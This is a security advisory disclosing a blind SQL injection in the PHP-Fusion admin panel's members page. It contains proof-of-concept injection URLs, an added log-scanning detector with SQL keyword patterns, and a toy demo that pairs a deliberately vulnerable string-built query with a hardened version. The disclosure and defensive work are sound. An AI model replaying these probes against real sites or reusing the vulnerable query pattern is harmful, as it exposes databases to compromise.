moften

Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07

Oct 6th, 2015
=============================================
MGC ALERT 2015-002
- Original release date: September 18, 2015
- Last revised: October 05, 2015
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07

II. BACKGROUND
-------------------------
PHP-Fusion is a lightweight open source content management system (CMS)
written in PHP.

III. DESCRIPTION
-------------------------
This bug was found while using the portal authenticated as administrator.
To exploit the vulnerability it is only necessary to use version 1.0 of the
HTTP protocol to interact with the application. It is possible to inject SQL
code through the "status" variable on the page "members.php".

IV. PROOF OF CONCEPT
-------------------------
The following URLs and parameters have been confirmed to suffer from
Blind SQL injection.

/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0

Exploiting with a true request (with MySQL 5):

/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0'
AND substr(@@version,1,1)='5

Exploiting with a false request:

/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0'
AND substr(@@version,1,1)='4

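Added example, not part of the advisory: a small Python log scanner that flags requests to the administration members.php page whose "status" parameter is not the plain integer the application expects, which is what the true/false requests above look like in a web server log. The access-log lines embedded in it are constructed for the example (they reuse the advisory's URLs with the payload percent-encoded as a browser would send it); the Apache combined log format, the "/administration/members.php" path suffix and the keyword list are assumptions, not anything PHP-Fusion ships.

```python
# Added example (not part of the advisory): flag requests to the PHP-Fusion
# administration members page whose "status" parameter is not the integer the
# application expects. Log lines below are constructed, in Apache combined format.
import re
from urllib.parse import urlsplit, parse_qs

SAMPLE_LOG = """\
10.0.0.5 - - [06/Oct/2015:10:12:01 +0000] "GET /phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0 HTTP/1.0" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [06/Oct/2015:10:12:09 +0000] "GET /phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0%27%20AND%20substr(@@version,1,1)=%275 HTTP/1.0" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [06/Oct/2015:10:12:14 +0000] "GET /phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0%27%20AND%20substr(@@version,1,1)=%274 HTTP/1.0" 200 4870 "-" "Mozilla/5.0"
10.0.0.7 - - [06/Oct/2015:10:13:00 +0000] "GET /phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=1 HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<code>\d{3}) (?P<size>\S+)'
)
# Assumed path of the vulnerable page (taken from the advisory's URLs).
MEMBERS_PATH_SUFFIX = "/administration/members.php"
INTEGER_RE = re.compile(r"^-?\d+$")
# Characters and keywords that never belong in an integer status code.
SQL_HINT_RE = re.compile(
    r"(['\"]|--|/\*|@@|\b(and|or|substr|substring|sleep|benchmark|union|select)\b)", re.I
)

def parse_line(line):
    """Split one combined-format log line; return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs percent-decodes values, so "%27" becomes "'" here.
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec

def classify_status(value):
    """Return None for the integer the page expects, otherwise a short reason."""
    if INTEGER_RE.match(value):
        return None
    if SQL_HINT_RE.search(value):
        return "sql-like content in status"
    return "non-integer status"

def scan_log(text):
    """Return one finding per suspicious "status" value sent to members.php."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].endswith(MEMBERS_PATH_SUFFIX):
            continue
        for value in rec["query"].get("status", []):
            reason = classify_status(value)
            if reason is None:
                continue
            findings.append({
                "ip": rec["ip"], "ts": rec["ts"], "proto": rec["proto"].strip(),
                "status": value, "size": rec["size"], "reason": reason,
            })
    return findings

def response_sizes_by_ip(findings):
    """Distinct response sizes per source: a true and a false probe answering
    with different sizes is the signal a boolean-based blind injection relies on."""
    sizes = {}
    for f in findings:
        sizes.setdefault(f["ip"], set()).add(f["size"])
    return sizes

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f)
    print(response_sizes_by_ip(hits))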
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-------------------------
PHP-Fusion <= v7.02.07

VII. SOLUTION
-------------------------
All data received by the application that can be modified by the user must
be validated before it is used in any kind of database transaction.

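Added example, not PHP-Fusion's own code: a toy members lookup in Python, using an in-memory SQLite database as a stand-in for MySQL, that places the string-built query behind this kind of bug beside a version that applies the validation the solution section calls for, checking "status" against an allowlist of integer codes and then binding it as a query parameter. The table layout, the sample rows, the VALID_STATUS set and the sqlite_version() probe (used in place of MySQL's @@version) are all constructed for the example.

```python
# Added example (not PHP-Fusion's own code): a toy members lookup using an
# in-memory SQLite database as a stand-in for MySQL. Table layout, rows and the
# VALID_STATUS allowlist are constructed for the example.
import sqlite3

# Assumed set of legitimate status codes; a real application would take this
# from its own definitions rather than a literal.
VALID_STATUS = {0, 1, 2}

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user_name TEXT, user_status INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", 0), (2, "bob", 0), (3, "carol", 1)])
    return conn

def members_vulnerable(conn, status):
    """The pattern behind the bug: the request value is pasted into the SQL text,
    so a quote in "status" ends the literal and the rest is parsed as SQL."""
    sql = "SELECT user_name FROM users WHERE user_status='" + status + "' ORDER BY user_id"
    return [row[0] for row in conn.execute(sql)]

def parse_status(raw):
    """Validate before the database sees the value: digits only, then allowlist."""
    if not isinstance(raw, str) or not raw.isdigit():
        raise ValueError("status must be a non-negative integer")
    value = int(raw)
    if value not in VALID_STATUS:
        raise ValueError("status out of range")
    return value

def members_hardened(conn, raw_status):
    """Validated value bound as a parameter; the SQL text never changes."""
    status = parse_status(raw_status)
    rows = conn.execute(
        "SELECT user_name FROM users WHERE user_status=? ORDER BY user_id", (status,))
    return [row[0] for row in rows]

def demo():
    """Replay the advisory's true/false probe shape against both versions.
    sqlite_version() stands in for MySQL's @@version; on SQLite 3 the first
    probe is true and the second is false."""
    conn = make_db()
    true_probe = "0' AND substr(sqlite_version(),1,1)='3"
    false_probe = "0' AND substr(sqlite_version(),1,1)='2"
    result = {
        "vulnerable_true": members_vulnerable(conn, true_probe),
        "vulnerable_false": members_vulnerable(conn, false_probe),
        "hardened_ok": members_hardened(conn, "0"),
    }
    try:
        members_hardened(conn, true_probe)
        result["hardened_probe"] = "accepted"
    except ValueError as exc:
        result["hardened_probe"] = str(exc)
    return result

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The vulnerable function answers the two probes with different row sets, which is exactly the true/false difference the proof of concept relies on; the hardened function rejects the probe before any SQL is built, and even a value that passes the digit check is sent as a bound parameter rather than spliced into the statement.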
VIII. REFERENCES
-------------------------
https://www.php-fusion.co.uk/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
September 18, 2015 1: Initial release
October 10, 2015 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-------------------------
September 18, 2015 1: Vulnerability acquired by Manuel Garcia Cardenas
September 18, 2015 2: Sent to vendor
September 24, 2015 3: Second mail to the vendor without response
October 10, 2015 4: Sent to the Full-Disclosure lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester